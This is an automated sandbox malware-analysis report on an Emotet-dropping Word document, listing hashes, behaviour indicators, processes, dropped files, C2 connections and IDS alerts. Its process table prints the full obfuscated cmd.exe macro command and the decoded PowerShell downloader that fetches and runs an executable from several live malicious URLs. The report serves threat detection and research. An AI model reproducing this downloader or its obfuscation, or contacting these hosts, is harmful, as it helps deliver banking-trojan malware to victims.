analyze malware
- Huge database of samples and IOCs
- Custom VM setup
- Unlimited submissions
- Interactive approach
| File name: | Express - 9WD46016082999121.doc |
| Full analysis: | https://app.any.run/tasks/80185f11-4a74-4f53-8812-10d9f8e3422e |
| Verdict: | Malicious activity |
| Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
| Analysis date: | November 14, 2018, 18:34:08 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/msword |
| File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Nov 14 17:27:00 2018, Last Saved Time/Date: Wed Nov 14 17:27:00 2018, Number of Pages: 1, Number of Words: 2, Number of Characters: 13, Security: 0 |
| MD5: | 391F42363533B86F12C6FCC4846F000A |
| SHA1: | 93630938F9911C44285EA0EF08BBB0C502E28E09 |
| SHA256: | D53A36237B3FEE0AC177055AD31BBAD0ACE8D7645EE50B50EC0CB64501420454 |
| SSDEEP: | 1536:+WzqUocn1kp59gxBK85fBt+a9Jx3GxdxoRlBsRghIxgBqx5xfxEBoxtBBB4xWDP:9M41k/W48DxuxoRlBsRghIxgBqx5xfx9 |
MALICIOUS
Starts CMD.EXE for commands execution
- WINWORD.EXE (PID: 3128)
Unusual execution from Microsoft Office
- WINWORD.EXE (PID: 3128)
Application was dropped or rewritten from another process
- lpiograd.exe (PID: 3556)
- Kji.exe (PID: 3648)
- Kji.exe (PID: 3604)
- lpiograd.exe (PID: 2340)
Downloads executable files from the Internet
- powershell.exe (PID: 3852)
Emotet process was detected
- lpiograd.exe (PID: 3556)
EMOTET was detected
- lpiograd.exe (PID: 2340)
Changes the autorun value in the registry
- lpiograd.exe (PID: 2340)
Connects to CnC server
- lpiograd.exe (PID: 2340)
SUSPICIOUS
Creates files in the user directory
- powershell.exe (PID: 3852)
Executes PowerShell scripts
- cmd.exe (PID: 3976)
Reads Internet Cache Settings
- powershell.exe (PID: 3852)
Executable content was dropped or overwritten
- powershell.exe (PID: 3852)
- Kji.exe (PID: 3604)
Starts itself from another location
- Kji.exe (PID: 3604)
Connects to unusual port
- lpiograd.exe (PID: 2340)
Connects to SMTP port
- lpiograd.exe (PID: 2340)
INFO
Reads Microsoft Office registry keys
- WINWORD.EXE (PID: 3128)
Creates files in the user directory
- WINWORD.EXE (PID: 3128)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
TRiD
| .doc | | | Microsoft Word document (54.2) |
|---|---|---|
| .doc | | | Microsoft Word document (old ver.) (32.2) |
EXIF
FlashPix
| CompObjUserType: | Microsoft Word 97-2003 Document |
|---|---|
| CompObjUserTypeLen: | 32 |
| HeadingPairs: |
|
| TitleOfParts: | - |
| HyperlinksChanged: | No |
| SharedDoc: | No |
| LinksUpToDate: | No |
| ScaleCrop: | No |
| AppVersion: | 16 |
| CharCountWithSpaces: | 14 |
| Paragraphs: | 1 |
| Lines: | 1 |
| Company: | - |
| CodePage: | Windows Latin 1 (Western European) |
| Security: | None |
| Characters: | 13 |
| Words: | 2 |
| Pages: | 1 |
| ModifyDate: | 2018:11:14 17:27:00 |
| CreateDate: | 2018:11:14 17:27:00 |
| TotalEditTime: | - |
| Software: | Microsoft Office Word |
| RevisionNumber: | 1 |
| LastModifiedBy: | - |
| Template: | Normal.dotm |
| Comments: | - |
| Keywords: | - |
| Author: | - |
| Subject: | - |
| Title: | - |
Total processes
38
Monitored processes
7
Malicious processes
7
Suspicious processes
0
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process |
|---|---|---|---|---|
| 3128 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Express - 9WD46016082999121.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
| 3976 | c:\wvBQHldjVqOM\YYZXLbOZn\HFAKEUwmzJ\..\..\..\windows\system32\cmd.exe /C"s^e^t ^[-^.=^'O^p^s';$n^Bf^='^htt&&set \^+?^.=^an^e^lapr&&^s^e^t ^#^,^$@=^.^P^at&&^s^e^t '^~=ervi&&s^e^t +^.=^w-Ob^j^ect&&^se^t ^#}^_=e^ll^ ^$z^Zo^=&&s^e^t ^[,*^+=n^t^s&&s^e^t '^`^.=^e&&^se^t ^;^]'^+=^8^@&&^s^et ^#`=^B&&^se^t ^}^`?=^h&&^se^t ^]^_\^*=^T&&^s^et '^\^@=N^Th.^t^yp&&s^e^t ^}`=^://^a^ion&&^s^e^t ^_^`~=^ow^er^s^h&&s^e^t {^]^'\=^.^s^en&&^s^e^t ^~^+=)^;$L^Ai^ ^=N^e&&^se^t ^*`^$=k^e^m^a^ler^k^o^l.net&&set ^-#=jZU);^Start&&s^e^t ^~^$^*=^h&&s^e^t ^-*^'=ht^tp^';$N^T^h^ &&^s^et ^]#^?=^om 'ad^o^d^b.^strea^m^'^;f&&s^e^t ^{^*^`}=n&&^s^e^t ^$.^*^}=v^e&&s^e^t ^@,^`=^.&&^se^t ^[+@^-=^$n&&se^t ?^.,^_=(^f7f81a39-5f63-5b42-9efd-1f13b5431005amp;&se^t $^.=^:/&&^se^t ;^?[^#=/n&&s^e^t ^*[^{^#=^m^ana&&^se^t #^{=n^t/&&^s^et ^,]^~=^o&&^se^t ,^?=^=^ Ne&&^s^et *^?,^\=^.^op&&s^e^t @^\^{=^b0^kQ^7&&^se^t ~^\=c^es&&^s^et ^#^]=^p&&^s^e^t #^.^-^'=^T'^,$Lr^G&&^s^e^t $^{`^@=Q&&^se^t `^]^*~=^p^://^zh^an&&^s^et ^.^3bb5484c-acd3-5883-ae5d-000aa204eed3 }=g^jia^b^ir^dn^e^s&&s^e^t .{-=^h^{&&s^e^t ^#^$^.@=^ ^ ^ ^ &&^se^t ]^-@^[=on^s^eB&&^se^t ^#^?=/&&^s^et ^+^{^\=^e ^=^ 1;f7f81a39-5f63-5b42-9efd-1f13b5431005amp;&s^e^t ^,^`=com/w^p-c^o&&^se^t .^-=c&&^s^e^t ^\-^@=^ ^-c&&s^e^t ^$^-^+=N&&^s^et ^-*=^i.&&^se^t ^{^+^?^]=n^t^e&&^s^et *^-=^f7f81a39-5f63-5b42-9efd-1f13b5431005amp;&^s^e^t ^@^-=^od^y)^;&&s^e^t ^+~^.=^d()^;^$N^Th&&s^e^t ^]}=^x^e'&&set \^]^'=^;$L^Ai&&^s^et ^~^#^@^'=^Obj^ec^t&&^s^e^t ^_^}'?=r&&^s^et @^[^,=r^each(f7f81a39-5f63-5b42-9efd-1f13b5431005amp;&s^e^t ^$[*^`=()^;&&^se^t ^{~^*=^f)&&^s^e^t ^[^;^#=w^-&&^s^e^t ^,^\{=to^f^i^le&&^se^t '^*=^et^a^.&&^se^t ~^?^]^[=^ ^ &&^s^e^t #^+^*=^h^t^t^p:&&s^e^t ^'^.^#^?='^G^E&&^s^et ^]^`_^@=^$NT^h^.s^a&&^s^et ^{^}=^,0&&se^t ^$^~^[-=r^eak^}&&^s^e^t ^~\^?^}=c&&^s^et ^#^$^,=^y{^f7f81a39-5f63-5b42-9efd-1f13b5431005amp;&s^e^t ^}^?~^[=co/P^U^x^AY&&^s^e^t ^-^,}^.=-^P&&^se^t @^`=^wr^i^t^e(^$^L^Ai^.r&&^s^e^t ^{^.-=)&&^s^e^t ^,.=^}}^ ^ ^ ^ &&se^t ^~^+^?=^m^@^h^ttp&&^s^e^t ^[_=^.&&^s^e^t {^*=()+^'^\^Kj&&s^e^t @^~=u^p&&s^e^t ^~^_=@')&&^s^et [^}^.=^p^j^x^u'.Sp^l^it(^'&&^se^t ;^[=roc^e^s^s ^$^j^ZU;b&&^s^e^t ;^\^`^*=^h]&&^s^et ^\^-_=^a^tc&&s^e^t ^,}=^L^A&&s^e^t }^\]^[=^e^sp&&s^e^t {^+`=^[S^y^st^e^m.^IO&&^s^e^t ^[^?=^Lr^G ^in^ &&set ^$^@^[=l^o^a^ds/&&^s^e^t \^{^?_=^e&&s^e^t #^.^?=o^m^.^br&&^s^e^t ^+^@^,^.=l^2^.^x^ml&&^s^et ^*^}=^{^t&&^s^e^t '^\^?=t^.&&^s^e^t ^*.=@^ht^t^p://^p&&^s^et ^].=^ ^-c^o^m 'm^s^x^m&&^se^t ^?^~*=;^$j^Z^U^=(&&^se^t ^{?=^i.^o^p^e&&^se^t ^+^*=^:^:^G^et&&s^et [^~#^`=n(&&^se^t ^.^?^]=^Te^mpPa^t&&^se^t ^?^+$=^Y&&^s^e^t ^.}=/&&^s^et ^`^};-=^g^em^e&&s^e^t ^'{=//s^i^tran^t^or.^e^s/^L^d^Lr^6F^8^A@htt^p&&c^al^l ^s^e^t \[?=%^#^]%%^_^`~%%^#}^_%%^[-^.%%`^]^*~%%^.^3bb5484c-acd3-5883-ae5d-000aa204eed3 }%%'^\^?%%^}^?~^[%%^*.%%\^+?^.%%'^*%%.^-%%#^.^?%%^#^?%%@^\^{%%$^{`^@%%^;^]'^+%%#^+^*%%^'{%%^}`%%^*[^{^#%%^`^};-%%^[,*^+%%'^~%%~^\%%^@,^`%%^,^`%%^{^+^?^]%%#^{%%@^~%%^$^@^[%%^~^+^?%%$^.%%^.}%%^*`^$%%;^?[^#%%^?^+$%%[^}^.%%^~^_%%^?^~*%%{^+`%%^#^,^$@%%;^\^`^*%%^+^*%%^.^?^]%%^}^`?%%{^*%%^-*%%'^`^.%%^]}%%^~^+%%^[^;^#%%^~^#^@^'%%^].%%^+^@^,^.%%^-*^'%%,^?%%+^.%%^\-^@%%^]#^?%%^,]^~%%@^[^,%%^[^?%%^[+@^-%%^#`%%^{~^*%%^*^}%%^_^}'?%%^#^$^,%%^,}%%^{?%%[^~#^`%%^'^.^#^?%%#^.^-^'%%^{^}%%^{^.-%%\^]^'%%{^]^'\%%^+~^.%%*^?,^\%%\^{^?_%%^{^*^`}%%^$[*^`%%*^-%%'^\^@%%^+^{^\%%^$^-^+%%^]^_\^*%%^~^$^*%%^[_%%@^`%%}^\]^[%%]^-@^[%%^@^-%%^]^`_^@%%^$.^*^}%%^,^\{%%?^.,^_%%^-#%%^-^,}^.%%;^[%%^$^~^[-%%^~\^?^}%%^\^-_%%.{-%%^,.%%~^?^]^[%%^#^$^.@%&&ca^ll %\[?%"
| c:\windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
| 3852 | powershell $zZo='Ops';$nBf='http://zhangjiabirdnest.co/PUxAY@http://panelapreta.com.br/b0kQ7Q8@http://sitrantor.es/LdLr6F8A@http://aionmanagementservices.com/wp-content/uploads/m@http://kemalerkol.net/nYpjxu'.Split('@');$jZU=([System.IO.Path]::GetTempPath()+'\Kji.exe');$LAi =New-Object -com 'msxml2.xmlhttp';$NTh = New-Object -com 'adodb.stream';foreach($LrG in $nBf){try{$LAi.open('GET',$LrG,0);$LAi.send();$NTh.open();$NTh.type = 1;$NTh.write($LAi.responseBody);$NTh.savetofile($jZU);Start-Process $jZU;break}catch{}} | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
| 3648 | "C:\Users\admin\AppData\Local\Temp\Kji.exe" | C:\Users\admin\AppData\Local\Temp\Kji.exe | — | powershell.exe |
User: admin Company: Borland Corporation Integrity Level: MEDIUM Description: Borland C++ Multi-thread RTL (WIN/VCL MT) Exit code: 0 Version: 8.0.0.0 | ||||
| 3604 | "C:\Users\admin\AppData\Local\Temp\Kji.exe" | C:\Users\admin\AppData\Local\Temp\Kji.exe | Kji.exe | |
User: admin Company: Borland Corporation Integrity Level: MEDIUM Description: Borland C++ Multi-thread RTL (WIN/VCL MT) Exit code: 0 Version: 8.0.0.0 | ||||
| 3556 | "C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe" | C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe | Kji.exe | |
User: admin Company: Borland Corporation Integrity Level: MEDIUM Description: Borland C++ Multi-thread RTL (WIN/VCL MT) Exit code: 0 Version: 8.0.0.0 | ||||
| 2340 | "C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe" | C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe | lpiograd.exe | |
User: admin Company: Borland Corporation Integrity Level: MEDIUM Description: Borland C++ Multi-thread RTL (WIN/VCL MT) Version: 8.0.0.0 | ||||
Total events
1 691
Read events
1 274
Write events
0
Delete events
0
Modification events
Executable files
2
Suspicious files
2
Text files
0
Unknown types
3
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 3128 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRA832.tmp.cvr | — | |
MD5:— | SHA256:— | |||
| 3852 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\8Q5NI20WBY1MT7RLXD2Q.temp | — | |
MD5:— | SHA256:— | |||
| 3852 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF5db37c.TMP | binary | |
MD5:3C6A7AAE234382390B6B52F47ECA1BAA | SHA256:C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2 | |||
| 3852 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:3C6A7AAE234382390B6B52F47ECA1BAA | SHA256:C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2 | |||
| 3128 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$press - 9WD46016082999121.doc | pgc | |
MD5:921A1022AB4FA4C2785D6E3C45C72174 | SHA256:A62E4DB6E7C62F274321C7C14D52DCED78B8C80D890DF4C22CC0A8920398C5F3 | |||
| 3604 | Kji.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe | executable | |
MD5:9962D26AE57C94404F4A21F2048A4C0F | SHA256:96650FB7488F2D2B7C6C88F5B02428CDC5B54A61F513A28B290450D10B24FF08 | |||
| 3128 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:6D91E9BA10BE7484E49E380771F2FD60 | SHA256:8038F61FD24C01152B1CA92CB2532880D10B68B637A378C6750D77DD73334427 | |||
| 3852 | powershell.exe | C:\Users\admin\AppData\Local\Temp\Kji.exe | executable | |
MD5:9962D26AE57C94404F4A21F2048A4C0F | SHA256:96650FB7488F2D2B7C6C88F5B02428CDC5B54A61F513A28B290450D10B24FF08 | |||
| 3852 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\IETldCache\index.dat | dat | |
MD5:D7A950FEFD60DBAA01DF2D85FEFB3862 | SHA256:75D0B1743F61B76A35B1FEDD32378837805DE58D79FA950CB6E8164BFA72073A | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
15
TCP/UDP connections
32
DNS requests
26
Threats
0
HTTP requests
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
2340 | lpiograd.exe | GET | — | 68.102.169.43:8080 | http://68.102.169.43:8080/ | US | — | — | malicious |
2340 | lpiograd.exe | GET | — | 83.110.100.209:443 | http://83.110.100.209:443/ | AE | — | — | malicious |
2340 | lpiograd.exe | GET | — | 190.146.205.227:80 | http://190.146.205.227/ | CO | — | — | malicious |
2340 | lpiograd.exe | GET | — | 71.71.126.201:8080 | http://71.71.126.201:8080/ | US | — | — | malicious |
2340 | lpiograd.exe | GET | — | 190.146.205.227:80 | http://190.146.205.227/whoami.php | CO | — | — | malicious |
3852 | powershell.exe | GET | 200 | 75.98.168.239:80 | http://zhangjiabirdnest.co/PUxAY/ | US | executable | 412 Kb | suspicious |
2340 | lpiograd.exe | GET | 200 | 24.176.53.106:80 | http://24.176.53.106/whoami.php | US | text | 11 b | malicious |
2340 | lpiograd.exe | GET | 200 | 76.73.213.148:8090 | http://76.73.213.148:8090/ | US | binary | 148 b | malicious |
2340 | lpiograd.exe | GET | — | 24.176.53.106:80 | http://24.176.53.106/ | US | — | — | malicious |
2340 | lpiograd.exe | GET | 200 | 24.220.80.37:80 | http://24.220.80.37/ | US | binary | 876 Kb | malicious |
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
3852 | powershell.exe | 75.98.168.239:80 | zhangjiabirdnest.co | A2 Hosting, Inc. | US | suspicious |
2340 | lpiograd.exe | 83.110.100.209:443 | — | Emirates Telecommunications Corporation | AE | malicious |
2340 | lpiograd.exe | 68.102.169.43:8080 | — | Cox Communications Inc. | US | malicious |
2340 | lpiograd.exe | 190.146.205.227:80 | — | Telmex Colombia S.A. | CO | malicious |
2340 | lpiograd.exe | 24.220.80.37:80 | — | Midcontinent Communications | US | malicious |
2340 | lpiograd.exe | 71.71.126.201:8080 | — | Time Warner Cable Internet LLC | US | malicious |
2340 | lpiograd.exe | 76.73.213.148:8090 | — | WideOpenWest Finance LLC | US | malicious |
2340 | lpiograd.exe | 67.8.238.53:80 | — | BRIGHT HOUSE NETWORKS, LLC | US | malicious |
2340 | lpiograd.exe | 24.176.53.106:80 | — | Charter Communications | US | malicious |
2340 | lpiograd.exe | 87.248.114.12:25 | mail.aol.com | Yahoo! UK Services Limited | GB | shared |
DNS requests
Domain | IP | Reputation |
|---|---|---|
zhangjiabirdnest.co |
| suspicious |
mail.trifoxpeoplesolutions.com |
| unknown |
smtp.lifelinetpa.com |
| malicious |
imap.mail.com |
| shared |
2007pop3.hgcbizmail.com |
| unknown |
pop3.mxhichina.com |
| unknown |
mail.aol.com |
| shared |
mail.outlook.com |
| unknown |
mail.serviciodecorreo.es |
| unknown |
mail.mail.me.com |
| unknown |
Threats
PID | Process | Class | Message |
|---|---|---|---|
3852 | powershell.exe | A Network Trojan was detected | ET POLICY Terse Named Filename EXE Download - Possibly Hostile |
3852 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3852 | powershell.exe | A Network Trojan was detected | ET CURRENT_EVENTS Likely Evil EXE download from MSXMLHTTP non-exe extension M2 |
3852 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
2340 | lpiograd.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo HTTP request |
2340 | lpiograd.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo HTTP request |
2340 | lpiograd.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo HTTP request |
2340 | lpiograd.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo HTTP request |
2340 | lpiograd.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo HTTP request |
2340 | lpiograd.exe | A Network Trojan was detected | SC BAD_UNKNOWN Malicious behaviour by Trojan-Banker.Win32.Emotet |
10 ETPRO signatures available at the full report